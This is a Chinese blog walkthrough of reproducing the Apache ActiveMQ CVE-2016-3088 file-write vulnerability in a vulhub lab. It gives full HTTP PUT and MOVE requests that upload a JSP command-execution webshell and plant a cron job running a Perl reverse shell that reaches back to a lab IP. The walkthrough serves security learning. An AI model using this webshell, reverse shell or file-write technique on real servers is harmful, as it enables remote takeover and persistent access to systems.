Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)复现

最新推荐文章于 2024-05-24 11:20:45 发布
最新推荐文章于 2024-05-24 11:20:45 发布
阅读量1.1k 收藏 18
点赞数 19
文章标签: activemq apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69994768/article/details/135768749
版权

一、搭建Docker、vulhub环境:

kali linux 下搭建 Vulhub 靶场(图文详解)_kali安装vulhub-CSDN博客

二、漏洞复现:

漏洞简介:

影响版本:Apache ActiveMQ 5.x~5.14.0

产生原因:ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。漏洞出现在fileserver应用中,支持写入文件,不解析jsp,支持移动文件(MOVE请求)。只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。(在5.14.0版本以后,彻底删除了fileserver应用。)

cd到vulhub(CVE-2016-3088)靶场编译环境打开环境:

浏览器打开页面admin/admin登录:

Brup抓包PUT方式上传webshell文件:

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.94.129:8161
Content-Length: 336

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

 while((line=br.readLine())!=null){
  out.print(line+"</br>");
 }
%>

尝试上传jsp文件,发现文件格式被禁止:

由于上传的是文本文件并不能被服务器解析,所以我们下一步要利用MOVE方法将上传的webshell移动到可以执行的目录并更改后缀为jsp。

写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。

默认的ActiveMQ账号密码均为admin,首先访问http://192.168.94.129:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:

将抓到的包改成move方法,并将我们前边写入的txt文件移到可以执行jsp文件的目录中:

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/1.jsp
Host: 192.168.94.129:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_template=default; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjY2NzYyODcyLCJlbWFpbCI6IiJ9._m5Os7Qfe03lFDNUNDvy5FH7qbelPu2xzFcmX2Ap4fM
Upgrade-Insecure-Requests: 1
 

可以看到我们已经可以命令执行了。

计划任务反弹

写入反弹计划命令:

PUT /fileserver/10.txt HTTP/1.1
Host: 192.168.94.129:8161
Content-Length: 250

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.94.129";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 

移动到/etc/cron.d/目录下,遇到ubuntu目录不太一样,参考这里

MOVE /fileserver/10.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: 192.168.94.129:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: think_template=default
Upgrade-Insecure-Requests: 1
 

等待上线即可!!不知道为什么我的没上线欢迎留言!

m0_69994768
关注
  • 19
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2862
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
ActiveMQ 反序列化漏洞CVE-2015-5254)复现
糖小喵
04-12 323
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...
Apache activeMQ漏洞复现
Shanfenglan's blog
12-14 3194
文章目录1. ActiveMQ 反序列化漏洞CVE-2015-5254)2. ActiveMQ任意文件写入漏洞CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 反序列化漏洞CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
最新发布
Ayixy的博客
05-24 816
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmet的jar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现及排查
dayouzi的博客
08-14 2249
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
activemq系列漏洞复现
m0_49420271的博客
06-07 2795
vulhub中activemq系列漏洞复现
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1481
ActiveMQ 反序列化漏洞
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQApache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
apache-activemq-5.16.6-bin.zip
12-26
这个"apache-activemq-5.16.6-bin.zip"文件包含了ActiveMQ的最新稳定版本5.16.6的二进制发行版,主要用于在各种环境中部署和运行。 **Apache ActiveMQ核心概念** 1. **消息队列(Message Queue)**: 消息队列是...
apache-activemq-5.16.5
12-27
标题"apache-activemq-5.16.5"指的是该软件的一个特定版本,即5.16.5版本,通常每个新版本都会包含错误修复、性能提升以及新功能的添加。 描述中提到"启动要求jdk版本8+", 这意味着在运行Apache ActiveMQ 5.16.5...
ActiveMQ反序列化漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
CVE-2016-3088 ActiveMQ漏洞复现
Makboli的博客
06-30 668
ActiveMQ漏洞复现CVE-2016-3088
ActiveMQ反序列化漏洞复现(CVE-2015-5254)
m0_49025459的博客
10-31 943
这里复现的靶场使用的是vulhub搭建的,过多的我就不赘述了,直接启动靶场,启动正确我们访问IP(靶场IP):8161这里以192.168.218.132:8161为例,如果出现下图场景,则证明靶场搭建成。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 2997
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
ActiveMQ任意文件写入漏洞CVE-2016-3088复现
s40d1's Blog
10-17 660
title:ActiveMQ任意文件写入漏洞CVE-2016-3088复现 ActiveMQ任意文件写入漏洞CVE-2016-3088) 文章目录title:ActiveMQ任意文件写入漏洞CVE-2016-3088复现ActiveMQ任意文件写入漏洞CVE-2016-3088)一、环境搭建二、背景简述三、影响版本四、漏洞详情五、漏洞防御六、漏洞利用案例写入webshell 一、环境搭建 搭建及运行漏洞环境: docker-compose build docker-compose up -d .
利用Vulnhub复现漏洞 - ActiveMQ任意文件写入漏洞CVE-2016-3088
JiangBuLiu的博客
06-27 1819
可点击目录分类快捷浏览↓Vulnhub官方复现教程漏洞原理背景简述漏洞详情复现漏洞启动环境写入webshell上传webshell设置浏览器代理配置(与Burp拦截设置一致)打开Burp Suite设置拦截端口(主机)(与浏览器设置一致)在Burp Suite的拦截抓包中写入WebShell移动到web目录下的api文件夹中:原教程移动到web目录下的api文件夹(/opt/activemq/we...
vulhub学习(2) Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
yukinorong的博客
06-24 3178
漏洞环境 配置vulhub , 在目录activemq/CVE-2016-3088中打开docker。 docker中显示 此时开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞原理 ActiveMQ Web控制台分为三个应用程序:admin,api和f
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 407
ActiveMQ反序列化漏洞CVE-2015-5254)复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
CVE-2016-3088复现
07-28
CVE-2016-3088是一个存在于fileserver应用中的漏洞,其原理是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。\[1\] 要复现漏洞,可以按照以下步骤进行操作: 1. 首先,需要将shell文件移动到具有解析权限的目录中。可以使用MOVE方式将shell移动到/opt/activemq/webapps/api/目录中,如果返回包返回204,则表示移动成功。\[2\] 2. 漏洞环境需要使用centos、docker、docker-compose、vulhub。启动服务后,可以使用命令docker ps来查看服务端口。\[3\] 3. 写入webshell需要将其写入admin或api应用中,而这两个应用都需要登录才能访问。 4. 首先访问http://服务器ip:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径。 5. 进入http://服务器ip:8161/fileserver,进行抓包。 6. 将GET请求修改为PUT,并在目录后加入想要上传的数据包。如果回显为204,则表示上传成功。 以上是复现CVE-2016-3088漏洞的步骤。请注意,这个漏洞已经被修复,建议及时更新相关软件以避免安全风险。 #### 引用[.reference_title] - *1* *3* [CVE-2016-3088 ActiveMQ漏洞复现](https://blog.csdn.net/zwj101010101010/article/details/126018390)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [ActiveMQ任意文件写入漏洞CVE-2016-3088复现](https://blog.csdn.net/weixin_38160576/article/details/121494757)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值